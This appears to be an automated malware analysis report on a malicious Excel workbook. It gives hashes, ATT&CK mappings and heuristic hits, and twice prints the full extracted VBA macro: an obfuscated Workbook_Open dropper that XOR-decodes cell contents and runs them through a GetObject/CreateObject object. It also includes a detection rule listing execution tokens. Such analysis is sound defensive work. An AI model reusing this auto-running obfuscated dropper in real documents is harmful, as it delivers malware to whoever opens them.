Office (OLE) / .XLS malware analysis — malicious · 404b3b8eb3635f2d

MALICIOUS

Office (OLE) / .XLS

39.5 KB Created: 2023-07-04 22:30:35 Authoring application: Microsoft Excel First seen: 2023-07-08

MD5: 3db8c3a6ca366ce4edb106056e2cee19 SHA-1: 7c74f6035d40d14be759f0e46d418c718e1bc900 SHA-256: 404b3b8eb3635f2d7d25794af53ee63870b8fa8b9f85e5cf65890964ffedd8b4

148 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

This Excel file contains VBA macros, including a Workbook_Open event, which are designed to execute code. The heuristics indicate the use of CreateObject and GetObject, suggesting the creation or manipulation of objects to run malicious code. The macro's AlphAbeticAl subroutine calls Towns.Run, which likely executes a second-stage payload. The obfuscated nature of the script prevents a more detailed analysis of the payload's exact function.

Heuristics 5

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Towns = GetObject(Athletics).CreateObject(Horizontal)
```
GetObject call high OLE_VBA_GETOBJ

GetObject call
Matched line in script
```
Set Towns = GetObject(Athletics).CreateObject(Horizontal)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Sub Workbook_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4378 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4378 bytes
SHA-256: `9441b863e94d632df9854b80400ef07e1b4214516e12130c4afd4054be60b2a1`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Option Explicit Private Towns As Object Private Sub SuperviSion(ByVal Athletics As String, ByVal Climbing As String, ByVal Horizontal As String, ByVal Loves As String) Coding Athletics, Horizontal AlphAbeticAl Towns, Loves, Climbing End Sub Sub AlphAbeticAl(ByVal Towns As Object, ByVal Loves As String, ByVal Climbing As String) Towns.Run Climbing, 0 End Sub Private Function Mozilla(ByVal Loving As String) As Variant Dim CorreCtion As Long: CorreCtion = 0: Dim Pointed() As Byte Dim ArtificiAl() As Byte, ConneCtor As String, Selecting As Integer, TiTTen As Integer, Permits As Integer ArtificiAl = "ub385e8cd2" GoTo BaBies Northeast: If CorreCtion < UBound(Pointed) Then Selecting = CorreCtion Mod (10) Permits = ArtificiAl(Selecting * 2) TiTTen = Pointed(CorreCtion) GoTo Rapidly SiSterS: ConneCtor = ConneCtor & Chr(Pointed(CorreCtion)) CorreCtion = CorreCtion + 1 GoTo Northeast Else GoTo Genuine End If Genuine: Mozilla = ConneCtor Exit Function BaBies: Pointed = Verified(Loving) GoTo Northeast Rapidly: Pointed(CorreCtion) = Abs(TiTTen Xor Permits) GoTo SiSterS End Function Sub Coding(ByVal Athletics As String, ByVal Horizontal As String) Set Towns = GetObject(Athletics).CreateObject(Horizontal) End Sub Sub Workbook_Open() SuperviSion Mozilla(Sheets("t66de").Range("J118").Value), Mozilla(Sheets("t66de").Range("H102").Value), Mozilla(Sheets("t66de").Range("H163").Value), Mozilla(Sheets("t66de").Range("F159").Value) End Sub Private Function Verified(ByVal Answered As String) As Variant Dim ConneCtor() As Byte, i As Long, Selecting As Integer, Crowd As Integer Crowd = Len(Answered) / 2: i = 0: ReDim ConneCtor(0 To Crowd) As Byte Permits: If i < Len(Answered) Then Selecting = Selecting + 1 ConneCtor(Selecting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Answered, i + 1, 2) i = i + 2 GoTo Permits Else GoTo Kennedy Dim Rapidly As String Rapidly = InputBox("celp lape") End If Kennedy: Verified = ConneCtor End Function Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: 9441b863e94d632df9854b80400ef07e1b4214516e12130c4afd4054be60b2a1

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit





                                            Private Towns As Object







                                                Private Sub SuperviSion(ByVal Athletics As String, ByVal Climbing As String, ByVal Horizontal As String, ByVal Loves As String)





             Coding Athletics, Horizontal





                                                                    AlphAbeticAl Towns, Loves, Climbing








                                                                        





               End Sub
Sub AlphAbeticAl(ByVal Towns As Object, ByVal Loves As String, ByVal Climbing As String)
Towns.Run Climbing, 0
End Sub
Private Function Mozilla(ByVal Loving As String) As Variant
Dim CorreCtion As Long: CorreCtion = 0: Dim Pointed() As Byte
Dim ArtificiAl() As Byte, ConneCtor As String, Selecting As Integer, TiTTen As Integer, Permits As Integer





                 ArtificiAl = "ub385e8cd2"








              






                 





           GoTo BaBies
Northeast:
If CorreCtion < UBound(Pointed) Then
Selecting = CorreCtion Mod (10)
Permits = ArtificiAl(Selecting * 2)
TiTTen = Pointed(CorreCtion)








                GoTo Rapidly
SiSterS:








                                            





                                                    ConneCtor = ConneCtor & Chr(Pointed(CorreCtion))
CorreCtion = CorreCtion + 1








                                                    GoTo Northeast








              Else
GoTo Genuine
End If
Genuine:







                   




                                                                        Mozilla = ConneCtor






                  






                                            Exit Function








BaBies:
Pointed = Verified(Loving)
GoTo Northeast






               




            







                                                                    






Rapidly:





                                                                    Pointed(CorreCtion) = Abs(TiTTen Xor Permits)








                 GoTo SiSterS
End Function






             Sub Coding(ByVal Athletics As String, ByVal Horizontal As String)
Set Towns = GetObject(Athletics).CreateObject(Horizontal)






                  End Sub
Sub Workbook_Open()
SuperviSion Mozilla(Sheets("t66de").Range("J118").Value), Mozilla(Sheets("t66de").Range("H102").Value), Mozilla(Sheets("t66de").Range("H163").Value), Mozilla(Sheets("t66de").Range("F159").Value)
End Sub






                                            Private Function Verified(ByVal Answered As String) As Variant







              






                                                    Dim ConneCtor() As Byte, i As Long, Selecting As Integer, Crowd As Integer








          Crowd = Len(Answered) / 2: i = 0: ReDim ConneCtor(0 To Crowd) As Byte






Permits:





                                        If i < Len(Answered) Then






                Selecting = Selecting + 1
ConneCtor(Selecting - 1) = Chr((20 - 6) + (((8 - 2) * 2) * 2)) & Chr((((32 / 4) * 2) + (4 * 5)) * 2) & Mid(Answered, i + 1, 2)
i = i + 2
GoTo Permits





                                        






               Else






                                                            GoTo Kennedy





                                        Dim Rapidly As String
Rapidly = InputBox("celp lape")
End If
Kennedy:
Verified = ConneCtor







                   End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.